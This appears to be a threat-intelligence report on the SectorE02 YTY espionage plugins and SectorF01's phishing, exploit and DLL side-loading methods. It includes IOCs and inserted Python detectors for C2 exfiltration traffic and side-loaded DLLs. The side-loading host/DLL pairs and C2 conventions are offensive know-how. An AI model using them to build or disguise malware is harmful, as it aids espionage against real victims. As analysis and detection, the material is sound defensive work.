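SAMPLE_BLOB = obfuscate(SAMPLE_PLAINTEXT)

if __name__ == "__main__":
    print(SAMPLE_BLOB)
    print(deobfuscate_auto(SAMPLE_BLOB))
```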

File Listing Plugin (d71a1d993e9515ec69a32f913c2a18f14cdb52ef06e4011c8622b5945440c1aa)

This executable plugin recursively searches through the “C:”, “D:”, “E:”, “F:”, “G:”, and “H:” drives, looking for interesting file extensions shown below. Several default folders are avoided by the malware.

Note that the “.inp” extension belongs to “Urdu InPage”, a word processing program which supports languages such as Urdu, the national language of Pakistan. The extensions newly added in the 2019 version of this plugin are “.odt” and “.eml”, and “.rft” is simply a misspelling of “.rtf”.

The latest version of the plugin looks for files with any of 14 different file extensions

It only looks for files modified later than the year 2017 and saves the text data of all matching files found in %APPDATA%\DriveData\Files\clist.log using the format “File Path|Size WriteTimestamp l_flag”.

File path and names for exfiltration are saved to a clist.log file

Copies of these matching files are also saved to the common exfiltration folder, %USERPROFILE%\Print\Network\Server\. Each copy is saved individually with a file name that is the full path of the original file, with slashes replaced by underscores.

Exact copies of the files the plugin is looking for are saved to the common exfiltration folder

Keylogger Plugin (f331f67baa2650c426daae9dee6066029beb8b17253f26ad9ebbd3a64b2b6a37)

This plugin starts off by using CreateEventA as a mutex with the value “k4351”. It saves user keystrokes, together with the title of the window they were typed in, to the common exfiltration folder, %USERPROFILE%\Print\Network\Server\. The file is saved as “<username>_YYYY_MM_DD(HH_mm_ss).txt”.

Example of input captured by the keylogger plugin

Uploader Plugin (d4e587b16fbc486a62cc33febd5438be3a9690afc1650af702ed42d00ebfd39e)

This plugin starts off by using CreateEventA as a mutex with the value “MyEvent3525” and only runs if the file %USERPROFILE%\DriveData\Files\win.txt exists. While the other plugins dump their files into the common exfiltration folder, the uploader plugin takes the files from that folder and uploads them to the C2 server, which is the same server the downloader uses. The uploaded files are deleted immediately afterwards.

The uploader performs an HTTP POST of the file to /upload/<computername> using HTTP forms, with the same hard-coded user agent as the downloader, “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0”.

Data sent to the C2 server through HTTPS for exfiltration
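Added example, not part of the report: detection logic for the downloader and uploader traffic described in the two sections above, run over constructed proxy log records. The tab-separated log format, client addresses and timestamps are assumptions; the URL paths, user agent, Content-Type command values and C2 hosts are the ones reported above, and the beaconing check uses the roughly 100-second poll interval.

```python
import re
from collections import defaultdict
from datetime import datetime

# Indicators taken from the report (domains written with real dots for matching).
YTY_USER_AGENT = ("Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) "
                  "Gecko/20100101 Firefox/52.0")
YTY_HOSTS = {"servicejobs.life", "data-backup.online",
             "179.43.170.155", "5.135.199.26"}
ORDERME_RE = re.compile(r"^/orderme/[A-Za-z0-9-]+-\d+$")   # GET <computername>-<random>
UPLOAD_RE = re.compile(r"^/upload/[A-Za-z0-9-]+$")         # POST <computername>
# The downloader's command channel uses bare, non-standard media types.
COMMAND_TYPES = {"application", "cmdline", "batcmd"}


def parse_line(line):
    """Parse one constructed, tab-separated proxy record:
    ts  client  method  host  path  status  response_content_type  user_agent"""
    ts, client, method, host, path, status, ctype, ua = line.rstrip("\n").split("\t")
    return {"ts": datetime.fromisoformat(ts), "client": client, "method": method,
            "host": host, "path": path, "status": int(status), "ctype": ctype, "ua": ua}


def classify(rec):
    """Return the reasons a record matches YTY downloader/uploader traffic."""
    reasons = []
    if rec["host"] in YTY_HOSTS:
        reasons.append("known C2 host")
    if rec["method"] == "GET" and ORDERME_RE.match(rec["path"]):
        reasons.append("downloader poll path /orderme/<computername>-<random>")
    if rec["method"] == "POST" and UPLOAD_RE.match(rec["path"]):
        reasons.append("uploader path /upload/<computername>")
    if rec["ctype"] in COMMAND_TYPES:
        reasons.append(f"bare command Content-Type '{rec['ctype']}'")
    # The UA is a genuine Firefox 52 string, so it only counts alongside another hit.
    if rec["ua"] == YTY_USER_AGENT and reasons:
        reasons.append("hard-coded YTY user agent")
    return reasons


def detect(lines, poll_window=(80, 130)):
    """Classify every record and add a beaconing alert for clients that hit
    /orderme/ repeatedly at the roughly 100-second cadence described above."""
    alerts = []
    poll_times = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        reasons = classify(rec)
        if reasons:
            alerts.append({"client": rec["client"],
                           "url": rec["host"] + rec["path"], "reasons": reasons})
        if rec["method"] == "GET" and ORDERME_RE.match(rec["path"]):
            poll_times[rec["client"]].append(rec["ts"])
    for client, times in poll_times.items():
        times.sort()
        deltas = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if len(deltas) >= 2 and all(poll_window[0] <= d <= poll_window[1] for d in deltas):
            mean = sum(deltas) / len(deltas)
            alerts.append({"client": client, "url": None,
                           "reasons": [f"periodic /orderme/ polling, mean interval {mean:.0f}s"]})
    return alerts


# Constructed proxy records (not real traffic): one beaconing host that then
# uploads, and an unrelated Firefox 52 user visiting mozilla.org.
SAMPLE_LOG = """\
2019-07-02T09:00:00\t10.0.0.15\tGET\tservicejobs.life\t/orderme/DESKTOP-7F3A2B-4821\t200\tapplication\t{ua}
2019-07-02T09:01:42\t10.0.0.15\tGET\tservicejobs.life\t/orderme/DESKTOP-7F3A2B-4821\t404\ttext/html\t{ua}
2019-07-02T09:03:23\t10.0.0.15\tGET\tservicejobs.life\t/orderme/DESKTOP-7F3A2B-4821\t404\ttext/html\t{ua}
2019-07-02T09:03:30\t10.0.0.15\tPOST\tservicejobs.life\t/upload/DESKTOP-7F3A2B\t200\ttext/html\t{ua}
2019-07-02T09:03:31\t10.0.0.22\tGET\twww.mozilla.org\t/en-US/firefox/\t200\ttext/html\t{ua}
""".format(ua=YTY_USER_AGENT).splitlines()

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```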

Summary

While the use of a modular framework is not a new concept, the SectorE02 group’s continual remaking of YTY framework plugins that serve the same purpose allows them to keep detections by security tools to a minimum. Based on their campaigns and the plugins we have seen, we believe they may be recreating each plugin on a per-campaign basis, meaning that each attack campaign might use new binaries coded from scratch that security tools are unlikely to detect. At the same time, their newfound caution in protecting their binaries from being downloaded, combined with their limited targeting, means that the hardest part of detecting and responding to the SectorE02 group may be finding their related binaries in the first place.

Indicators of Compromise

Malicious Excel Files (SHA-256)
Dropped Batch Scripts (SHA-256)

Dropped YTY Downloaders (SHA-256)

YTY File Plugin

8fff7f07ebf0a1e0a4eabdcf57744739f39de643d831c36416b663bd243590e1
d71a1d993e9515ec69a32f913c2a18f14cdb52ef06e4011c8622b5945440c1aa

YTY Screenshot Plugin

f10f41bd38832596d4c449f81b9eb4129361aa4e4ebd4a8e8d2d8bf388934ca5

YTY Keylogger Plugin

f331f67baa2650c426daae9dee6066029beb8b17253f26ad9ebbd3a64b2b6a37

YTY File Exfiltration Uploader Plugin

d4e587b16fbc486a62cc33febd5438be3a9690afc1650af702ed42d00ebfd39e

IP Addresses

179[.]43[.]170[.]155
5[.]135[.]199[.]26

Domains

data-backup[.]online
servicejobs[.]life

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these malware.

Initial Access

T1193 Spearphishing Attachment

Execution

T1059 Command-Line Interface
T1053 Scheduled Task
T1064 Scripting
T1204 User Execution

Persistence

T1158 Hidden Files and Directories
T1060 Registry Run Keys / Startup Folder
T1053 Scheduled Task

Defense Evasion

T1140 Deobfuscate/Decode Files or Information
T1107 File Deletion
T1158 Hidden Files and Directories
T1066 Indicator Removal from Tools
T1112 Modify Registry
T1027 Obfuscated Files or Information
T1064 Scripting

Credential Access

T1056 Input Capture

Discovery

T1010 Application Window Discovery
T1083 File and Directory Discovery
T1082 System Information Discovery
T1497 Virtualization/Sandbox Evasion

Collection

T1119 Automated Collection
T1005 Data from Local System
T1039 Data from Network Shared Drive
T1025 Data from Removable Media
T1074 Data Staged
T1114 Email Collection
T1056 Input Capture
T1113 Screen Capture

Command and Control

T1043 Commonly Used Port
T1071 Standard Application Layer Protocol

Exfiltration

T1020 Automated Exfiltration
T1041 Exfiltration Over Command and Control Channel

References

[1] Microsoft Docs | localtime, _localtime32, _localtime64
https://docs.microsoft.com/en-us/cpp/c-runtime-library/reference/localtime-localtime32-localtime64?view=vs-2019

The Growth of SectorF01 Group’s Cyber Espionage Activities

Abstract

Since 2013, a hacking group receiving state-level support has conducted cyber espionage campaigns against countries around the South China Sea. We refer to this group as SectorF01. From 2017, their activities have increased significantly. They mainly carry out these campaigns against government agencies and diplomatic, military, and research institutions in neighboring countries, along with surveillance activities against opposing forces in their own country.

In recent years, the SectorF01 group has been engaged in cyber espionage against various industries for its own benefit. They put extra focus on the automobile industry, and their target countries have expanded to include South Korea and Japan in the East Asian region. We decided to take a step-by-step look at more than 800 types of malware used by the SectorF01 group from 2013 until now (H1 2019). In this post, we will focus on the initial penetration methods that the SectorF01 group uses against their targets. We will see that they love using DLL side-loading.

Targets

Target Countries

The SectorF01 group conducts cyber espionage mainly in countries in Southeast Asia and East Asia. The victims are the countries around the South China Sea, and these countries belong to the Association of Southeast Asian Nations (ASEAN).

The SectorF01 group’s intensive attack targets are in the following countries:

• Vietnam
• China
• Cambodia
• Laos
• Thailand
• Myanmar
• Philippines
• Malaysia
• Indonesia
• Singapore

Recently, they have also been expanding their cyber espionage activities to the following countries in East Asia:

• Japan
• South Korea

Targets of the SectorF01 group

The ellipses marked with red dotted lines are the range of countries targeted by the SectorF01 group, and the dark red ellipses are the range of countries where the attack is more concentrated. The ellipses, marked with orange dotted lines, are a range of countries that have recently been included in the attack target as the SectorF01 group expands their activities.

Target Industries

The SectorF01 group conducts cyber espionage activities against the following fields:

• Vietnamese dissidents, journalists, and activists
• ASEAN-related organizations
• Government institutions
• Diplomatic institutions
• Military institutions
• Marine-related organizations: maritime organizations, marine research institutes, shipping companies, etc.
• Scientific research institutes
• Universities and educational institutions
• Foreign companies in Vietnam
• Automotive Industry

Statistics for Cyber Espionage Activities in SectorF01 Group

The SectorF01 group has seen steady annual growth since its inception as a cyber espionage player in 2013 and has become one of the most influential threat actor groups in Southeast Asia. We compiled statistics about their activities from the more than 800 malware executables that the SectorF01 group has used in attacks.

The roughly 800 malware samples used in the statistics are all Windows executables. Polymorphic binaries, which are produced when sandboxes execute a sample and whose file hashes change each time they run, are excluded from these statistics; only the initial file is counted. Such polymorphic binaries are not used in attacks, so excluding them minimizes statistical errors and misinterpretation.

This graph aggregates the number of malware samples used in attacks by the SectorF01 group each year. It can be seen that the number of malware samples they use each year is steadily increasing.

The Growth of the SectorF01 group’s Malware

The following are statistics for the time of day and day of the week on which the SectorF01 group created their malware. We have analyzed about seven years of the SectorF01 group’s cyber espionage activity and concluded that they are highly likely to be a threat actor group sponsored by the Vietnamese government. We compiled the compile-time statistics from the timestamps of about 500 binaries, after excluding those among the 800 binaries considered to have modified timestamps.

Assuming that the SectorF01 group is active in Vietnam, we set the time zone to UTC+7 (Vietnam time zone) and created statistics on that basis. Given that business hours in Vietnam are mainly from 8:00 am to 5:00 pm, about 68% of the malware samples were created during Vietnamese business hours. Binaries were also rarely created at lunch time.

SectorF01 Group’s Malware Compile Time (UTC+7)

Next, we created statistics for the days when the SectorF01 group created binaries. The SectorF01 group made binaries on weekdays rather than weekends. About 86% of malware were made on weekdays. Among them, most binaries were produced on Mondays.

The days of the week that the SectorF01 group compiled their binaries

SectorF01 Group’s Initial Access Tactics

The SectorF01 group uses a variety of methods for initial penetration. They mainly use malware delivered to the target via email attachments and at other times, infect specific targets that access websites via watering hole attacks. Here we describe the various initial penetration methods they have used.

Spearphishing Attachment & Spearphishing Link

The SectorF01 group usually delivers their malware through email attachments or links. The definition of these techniques can be found in the MITRE ATT&CK Framework.

“Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution.”
MITRE ATT&CK – T1193, Spearphishing Attachment


“Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.”
MITRE ATT&CK – T1192, Spearphishing Link


Below, we can see the various ways malware is sent through attachments or links in emails used by the SectorF01 group.

Delivery Method 1: How Executable Files are Delivered

(1.1) Executable file disguised as normal document file

The SectorF01 group uses an executable that masquerades as a normal document file, such as a Word or PDF document, so that the user mistakes it for a document and executes it. They change the icon of the file to that of the document program, or add a document file extension such as “.doc” or “.pdf” before the “.exe” executable extension. These executables are usually compressed and delivered as email attachments.

(1.2) Malware disguised as normal program

The SectorF01 group gives the malware the file name of a normal program such as a web browser installer (Firefox, Chrome) or an Adobe Flash web browser plug-in installer. In addition, malware has been distributed disguised as a normal program used only in the target country.

Malware disguised as normal program installation file

(1.3) Malware using the “Space after Filename” technique

The SectorF01 group uses the “Space after Filename” technique to make the executable look like a normal document file: a document extension such as “.doc” or “.docx” is inserted before the “.exe” extension, with many spaces in between. Depending on the width of the filename field, the “.exe” extension is pushed out of view by the long run of spaces, and the user may mistake the executable for a document file.

Executable file disguised as document file through “Space after Filename” technique

(1.4) Malware contained in RAR archive

The SectorF01 group mainly creates malware in the form of compressed archives for delivering malicious executable files or document files and delivers them to the attack target. The compression formats they have used in the past are RAR, ZIP, GZIP, though the SectorF01 group mainly uses the RAR compression format.

Malware included in RAR archive

(1.5) SFXZIP autorun compressed file malware

The SectorF01 group also uses SFX (self-extracting archive) autorun compression file malware. They utilize the WinRAR program’s ability to generate SFX compressed files to generate malware with the ZIP compression format rather than the RAR compression format.

SFX compressed file creation method of ZIP compression format using WinRAR program
ZIP compression format SFX compressed file type malware

(1.6) Malware distribution method using HTA

The SectorF01 group uses HTA to spread malware. HTA stands for Microsoft HTML Application and uses the “.hta” extension. A typical HTA file is structured similarly to an HTML file, but is run by a separate utility program called “mshta.exe” rather than a web browser like Internet Explorer. The SectorF01 group spreads malware by including VBScript in the “.hta” file, and that VBScript works by dropping the embedded malware or downloading additional malware. The advantage here is that while VBScript has limited privileges in a web browser due to security controls, these security controls are bypassed when the VBScript is executed via an HTA file.

Malware delivered in the form of an HTA file
VBScript to generate malware contained in HTA file

(1.7) Malware distribution method using Shortcut (LNK)

The SectorF01 group uses shortcut (“.lnk”) files to spread malware. Such LNK files can execute commands. They set the LNK file to run VBScript code using the “mshta.exe” program. It is delivered to the target by disguising icons and extensions which look like word document files. If the target mistakes the LNK file for a document file and executes it, then the VBScript code is executed to download and execute an additional malware file from a server.

The following is a malicious LNK file used by the SectorF01 group:

Malware delivered in the form of an LNK file
Malicious LNK files to download and run additional malware

(1.8) Deliver malware download link using cloud service

The SectorF01 group uses Amazon’s AWS S3 and Dropbox cloud storage services to upload malware, and that link is delivered via email.

Delivery Method 2: How malware is executed using macros

(2.1) Attacks using macros contained in a document

The SectorF01 group mainly delivers word documents containing macros to the target. The filename of the document is set to be something the target might be interested in and they attach the document to their email. The victim will not be infected if the malicious macro does not run, so the document body contains a social engineering technique to encourage the user to activate the macro.

Malicious Word document file with macros
Malicious macros contained in Word documents

(2.2) Attacks that convert macros to ActiveMime form

Word document files containing traditional malicious macros are more easily detected by security solutions such as antivirus and anti-spam filters. To bypass this, the SectorF01 group also uses the ActiveMime format. ActiveMime is an undocumented Microsoft file format that encodes macros in Microsoft Office. When you convert a Microsoft Office document that contains a macro to the “.mht (Microsoft Web Archive)” format, the macro is included in the “.mht” file in ActiveMime format. These converted macros can bypass security solutions because they can be detected only by analyzing the ActiveMime format.

The SectorF01 group changed the extension of the malicious document which was converted to “.mht” file format to the “.doc” extension and attached it to the email and delivered it to the target.

MHT malware with ActiveMime masquerading as a DOC file
ActiveMime format with malicious macros
Screen shown when the Word document file containing the macro converted to ActiveMime is run

Delivery Method 3: Deploy malware using vulnerabilities

The SectorF01 group exploits vulnerabilities that are widely used. Because these exploits are already used by many attackers, they can mask the attacker’s characteristics to some extent.

(3.1) CVE-2017-0199

The CVE-2017-0199 vulnerability occurs because Microsoft Office programs do not properly handle OLE objects. A malicious file such as an HTA (HTML Application) can be downloaded from a remote server and executed through a flaw in the way MS Office processes a URL Moniker object.

The SectorF01 group used the CVE-2017-0199 vulnerability to deliver an RTF document containing a malicious OLE2link object to the target. The OLE2link object downloads the VBScript HTA file containing the Powershell command to run.

(3.2) CVE-2017-8570

The CVE-2017-8570 vulnerability occurs because Microsoft Office programs cannot properly handle OLE objects. It exists in the way MS Office handles Composite Moniker objects and can execute SCT (Windows Script Component) scripts included in OLE packages.

The SectorF01 group uses the CVE-2017-8570 vulnerability to deliver an RTF document containing a malicious “.sct” file that generates malware to the target.

Malicious documents using CVE-2017-8570 vulnerability

(3.3) CVE-2017-11882

The CVE-2017-11882 vulnerability is a vulnerability that occurs when the Equation Editor (EQNEDT32.EXE), a component of the MS Office program, fails to properly handle certain objects. While MS Office is processing certain objects in memory, it can execute arbitrary code through the vulnerability.

The SectorF01 group attacked targets by delivering a malicious RTF document containing shellcode that generates malware by exploiting the CVE-2017-11882 vulnerability.

Malicious documents using CVE-2017-11882 vulnerability
CVE-2017-11882 Vulnerability Code

(3.4) CVE-2018-20250

The CVE-2018-20250 vulnerability occurs in UNACEV2.dll, which is included in the WinRAR compression program. By manipulating the file name field during processing of the ACE compression format, an attacker can write a file to a chosen path. This allows an attacker to place an executable in a path from which it runs automatically at system boot, such as the “startup program” folder.

As many threat actor groups began to use the CVE-2018-20250 vulnerability, the SectorF01 group also did the same.

Malware using CVE-2018-20250 vulnerability

Delivery Method 4: Drive-by Compromise (Watering Hole)

The SectorF01 group infects targets that visit legitimate sites by hacking a normal website and inserting malicious scripts into it in order to steal account information or deliver malware. This attack is known as Drive-by Compromise. Rather than hacking websites indiscriminately, attackers choose websites that are frequently visited by specific targets, which is why this attack is also called a watering hole attack.

“A drive-by compromise is when an adversary gains access to a system through a user visiting a website over the normal course of browsing. With this technique, the user’s web browser is targeted for exploitation.”
MITRE ATT&CK – T1189, Drive-by Compromise


The SectorF01 group targeted specific individuals or organizations by attacking websites primarily visited by key personnel and activists who oppose the Vietnamese government. They have also attacked government, diplomatic, defense and research websites in Vietnam as well as in Cambodia, China, Laos and the Philippines, and hacked ASEAN-related websites.

The following is the timing of the large-scale watering hole attacks by the SectorF01 group:

• May 2014, September 2014
• January 2015, March 2015
• May 2017
• September 2018, December 2018
• January 2019

When a target accesses a specific web site, the attacker distributes malware disguised as a web browser program or a plug-in, or displays a fake login page for collecting credential data. They also created domains similar to a normal website or online services and malicious scripts were inserted into fake domain websites to collect information about their targets.

TOO MUCH LOVE for DLL Side-Loading

The SectorF01 group prefers the “DLL Side-Loading” technique to execute their malware. DLL side-loading technique is also called “DLL Hijacking”, “DLL Preloading”, and “DLL Planting”. The MITRE ATT&CK Framework defines “DLL Side-Loading” as follows.

“Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL. Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.”
Definition of DLL Side-Loading


When DLLs are loaded in Windows OS, the order of searching is as follows:

1. The directory from which the application loaded.
2. The current directory.
3. The system directory. Use the GetSystemDirectory function to get the path of this directory.
4. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched.
5. The Windows directory. Use the GetWindowsDirectory function to get the path of this directory.
6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the App Paths registry key. The App Paths key is not used when computing the DLL search path.
Dynamic-Link Library Search Order


Because the DLL file is in the same directory as the executable file, that DLL is loaded first, as the application directory has the highest search priority. The SectorF01 group distributes the legitimate file and the malicious DLL file together so that they are in the same path, and the malicious DLL is then loaded when the normal file is executed.

This will make it seem as though it is a DLL file being loaded by a legitimate program and this can bypass detection of an endpoint security solution that performs behavior-based detection.

The SectorF01 group has distributed MS Windows OS files or popular programs with DLLs to load their malicious DLL files. In some cases, the legitimate files of famous anti-virus software are also used to load malicious DLLs.

The SectorF01 group loves the “DLL Side-Loading” technique so much that they abused many legitimate programs. We wondered how many normal programs were exploited, so we summarized all the normal programs we found.

The normal program files used by the SectorF01 group for “DLL Side Loading” are as follows:

• Microsoft Office Word (WINWORD.EXE)
• Windows Search (SearchIndexer.exe)
• Windows Search (SearchProtocolHost.exe)
• Google Update (GoogleUpdate.exe)
• Adobe AcroTranscoder (AcroTranscoder.exe)
• Adobe Flash Player Control Panel Applet (FlashPlayerApp.exe)
• Adobe Acrobat 3D Utility (A3DUtility.exe)
• WeChat (WeChat.exe)
• Coc Coc Browser Update (CocCocUpdate.exe)
• 360安全浏览器 (360 Secure Browser) (360se.exe)
• 360软件管家 (360 Software Manager) (SoftManager.exe)
• Neuber Software Typograf font manager (FontSets.exe)
• McAfee VirusScan On-Demand Scan (mcods.exe)
• McAfee Oem Module (mcoemcpy.exe)
• Symantec Network Access Control (rastlsc.exe)
• Kaspersky Anti-Virus Installation assistant host (avpia.exe)
• Kaspersky Light Plugin Extension Registrar (plugins-setup.exe)
• Avast Antivirus remediation (wsc_proxy.exe)

They used major programs from Microsoft, Google and Adobe, and used popular local programs such as WeChat, Coc Coc Browser, and 360 Secure Browser. They also used programs from anti-virus vendors such as McAfee, Symantec, Kaspersky, and Avast.
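The search order and the host/DLL list above translate directly into a hunting rule. The following is an added example (not code from the NSHC report): it runs that rule over constructed, simplified Sysmon-style ImageLoad records, where the field names and the `ProcessOriginalFileName` field (assumed to be joined from the process-creation event) are assumptions, not the exact Sysmon schema.

```python
"""Hunting for the DLL side-loading pattern described in the report.

Added example, not code from the NSHC report. The host/DLL pairs are the ones
the report lists; the log records are constructed, simplified Sysmon-style
ImageLoad events (field names are assumptions, not the real Sysmon schema).
"""
import ntpath
from typing import Dict, List, Set, Tuple

# Host executable -> DLL names it loads, lower-cased, as listed in the report.
SIDELOAD_PAIRS: Dict[str, Set[str]] = {
    "winword.exe": {"wwlib.dll"}, "searchindexer.exe": {"msfte.dll"},
    "searchprotocolhost.exe": {"msfte.dll"}, "googleupdate.exe": {"goopdate.dll"},
    "acrotranscoder.exe": {"flash video extension.dll"}, "flashplayerapp.exe": {"uxtheme.dll"},
    "a3dutility.exe": {"bib.dll", "ace.dll", "agm.dll", "cooltype.dll", "msvcp80.dll", "msvcr80.dll"},
    "wechat.exe": {"wechatwin.dll"}, "coccocupdate.exe": {"coccocpdate.dll"},
    "360se.exe": {"chrome_elf.dll"}, "softmanager.exe": {"dbghelp.dll"},
    "fontsets.exe": {"faultrep.dll"}, "mcods.exe": {"mcvsocfg.dll"},
    "mcoemcpy.exe": {"mcutil.dll"}, "rastlsc.exe": {"rastls.dll"},
    "avpia.exe": {"product_info.dll"}, "plugins-setup.exe": {"product_info.dll"},
    "wsc_proxy.exe": {"wsc.dll"},
}

# DLLs from the list that Windows itself ships in the system directory; search
# order step 1 lets a same-named file beside the executable win over them.
SYSTEM_DLLS = {"uxtheme.dll", "dbghelp.dll", "faultrep.dll"}

# Directories where a vendor's own copy of a DLL is expected to live (assumption).
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def _dir(path: str) -> str:
    """Lower-cased parent directory with a trailing backslash; ntpath works off-Windows too."""
    return ntpath.dirname(path).lower() + "\\"


def analyze_image_load(event: dict) -> List[str]:
    """Return the reasons an ImageLoad event matches the side-loading pattern (empty = clean)."""
    proc = ntpath.basename(event["Image"]).lower()
    dll = ntpath.basename(event["ImageLoaded"]).lower()
    # The original name in the binary's version info survives a rename: the
    # report's renamed WINWORD.EXE still carries OriginalFileName WinWord.exe.
    original = event.get("ProcessOriginalFileName", "").lower()
    host = original or proc
    if dll not in SIDELOAD_PAIRS.get(host, set()):
        return []  # not a host/DLL pair the report describes
    reasons: List[str] = []
    proc_dir, dll_dir = _dir(event["Image"]), _dir(event["ImageLoaded"])
    if original and original != proc:
        reasons.append(f"host renamed: {proc} carries OriginalFileName {original}")
    if dll_dir == proc_dir and not dll_dir.startswith(TRUSTED_ROOTS):
        reasons.append(f"{dll} loaded from the host's own directory {dll_dir} outside trusted roots")
    if dll in SYSTEM_DLLS and not dll_dir.startswith("c:\\windows\\"):
        reasons.append(f"{dll} normally lives in the system directory but was loaded from {dll_dir}")
    if event.get("Signed", "false").lower() != "true":
        reasons.append(f"{dll} is unsigned")
    return reasons


def hunt(events: List[dict]) -> List[Tuple[str, str, List[str]]]:
    """Run analyze_image_load over a batch of events and keep only the hits."""
    hits = []
    for event in events:
        reasons = analyze_image_load(event)
        if reasons:
            hits.append((event["Image"], event["ImageLoaded"], reasons))
    return hits


# Constructed sample telemetry (not real events): one legitimate load, two
# loads shaped like Side Load 1 and Side Load 12, and one unrelated load.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ProcessOriginalFileName": "WinWord.exe",
     "ImageLoaded": r"C:\Program Files\Microsoft Office\root\Office16\wwlib.dll",
     "Signed": "true"},
    {"Image": r"C:\Users\victim\Downloads\invoice.exe",  # renamed WINWORD.EXE
     "ProcessOriginalFileName": "WinWord.exe",
     "ImageLoaded": r"C:\Users\victim\Downloads\wwlib.dll",
     "Signed": "false"},
    {"Image": r"C:\Users\victim\AppData\Local\Temp\FontSets.exe",
     "ProcessOriginalFileName": "FontSets.exe",
     "ImageLoaded": r"C:\Users\victim\AppData\Local\Temp\FaultRep.dll",  # shadows System32 copy
     "Signed": "false"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ProcessOriginalFileName": "NOTEPAD.EXE",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": "true"},
]
```

Running `hunt(SAMPLE_EVENTS)` flags only the two Downloads/Temp loads; the legitimate Office load and the notepad load produce no reasons.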

Side Load 1 – Microsoft Office Word (WINWORD.EXE)

The SectorF01 group used the normal “WINWORD.EXE” file from “Microsoft Office Word” to utilize the “DLL Side-Loading” technique. The normal “WINWORD.EXE” file loads a “wwlib.dll” DLL file.

The normal “WINWORD.EXE” file sequentially searches the following paths to check if it exists in order to load the “wwlib.dll”.

The file “Ho so dang ky lam dai ly uy quyen chinh thuc cua Huyndai – Thanh Cong – Nguyen Thi Mai Phuong.exe” file has a filename related to the topic that the target may be interested in. This is the normal file “WINWORD.EXE” with only the name changed.

They set the file name of their malicious DLL to be “wwlib.dll” and deploy it in the same path along with the renamed normal “WINWORD.EXE” file. When the victim executes this renamed “WINWORD.EXE”, the malicious “wwlib.dll” file is loaded and malware is executed.

The following shows the code in “WINWORD.EXE” that loads the “wwlib.dll” exported “FMain”.

The malicious DLL “wwlib.dll” is loaded and calls the Export function “FMain”.

The “FMain” of the malicious DLL “wwlib.dll” contains the malicious code.

Side Load 2 – Windows Search (SearchIndexer.exe)

The SectorF01 group used the normal “SearchIndexer.exe” file from “Windows Search” to utilize the “DLL Side-Loading” technique. The normal “SearchIndexer.exe” file loads a “msfte.dll” DLL file.

They set the file name of their malicious DLL to be “msfte.dll” and deploy it in the same path along with the renamed normal “SearchIndexer.exe” file. When the victim executes this renamed “SearchIndexer.exe”, the malicious “msfte.dll” file is loaded and malware is executed.

The following shows the code in “SearchIndexer.exe” loading the “msfte.dll”.

Side Load 3 – Windows Search (SearchProtocolHost.exe)

The SectorF01 group used the normal “SearchProtocolHost.exe” file from “Windows Search” to utilize the “DLL Side-Loading” technique. The normal “SearchProtocolHost.exe” file loads a “msfte.dll” DLL file.

They set the file name of their malicious DLL to be “msfte.dll” and deploy it in the same path along with the renamed normal “SearchProtocolHost.exe” file. When the victim executes this renamed “SearchProtocolHost.exe”, the malicious “msfte.dll” file is loaded and malware is executed.

The following shows the code in “SearchProtocolHost.exe” loading the “msfte.dll”.

Side Load 4 – Google Update (GoogleUpdate.exe)

The SectorF01 group used the normal “GoogleUpdate.exe” file from “Google Update” to utilize the “DLL Side-Loading” technique. The normal “GoogleUpdate.exe” file loads a “goopdate.dll” DLL file.

They set the file name of their malicious DLL to be “goopdate.dll” and deploy it in the same path along with the renamed normal “GoogleUpdate.exe” file. When the victim executes this renamed “GoogleUpdate.exe”, the malicious “goopdate.dll” file is loaded and malware is executed.

Side Load 5 – Adobe AcroTranscoder (AcroTranscoder.exe)

The SectorF01 group used the normal “AcroTranscoder.exe” file from AcroTranscoder software to utilize the “DLL Side-Loading” technique.

The normal “AcroTranscoder.exe” file loads a “Flash Video Extension.dll” DLL file.

The following is a malicious word document “FW Report on demonstration of former CNRP in Republic of Korea.doc” used by the SectorF01 group.

When this document is executed, the malicious DLL “Flash Video Extension.dll” and the renamed legitimate “AcroTranscoder.exe” are deployed in the same path. When the normal “AcroTranscoder.exe” is executed, the malicious “Flash Video Extension.dll” file is loaded and malware is executed.

The malicious DLL “Flash Video Extension.dll” is loaded and calls the Export API functions. The SectorF01 group put their malicious code in the “FLVCore::Uninitialize” function, while all other functions point to the same address as the “FLVCore::Uninitialize” function. Thus, as long as any Export API of the “Flash Video Extension.dll” is called, the malware is executed.

The “FLVCore::Uninitialize” export function of the malicious DLL “Flash Video Extension.dll” contains code that performs malicious actions.

Side Load 6 – Adobe Flash Player Control Panel Applet (FlashPlayerApp.exe)

The SectorF01 group used the normal “FlashPlayerApp.exe” (Adobe Flash Player Control Panel Applet software) to utilize the “DLL Side-Loading” technique. The normal “FlashPlayerApp.exe” file loads a “UxTheme.dll” DLL file.

They set the file name of their malicious DLL to be “UxTheme.dll” and deploy it in the same path along with the renamed normal “FlashPlayerApp.exe” file. When the victim executes this renamed “FlashPlayerApp.exe”, the malicious “UxTheme.dll” file is loaded and malware is executed.

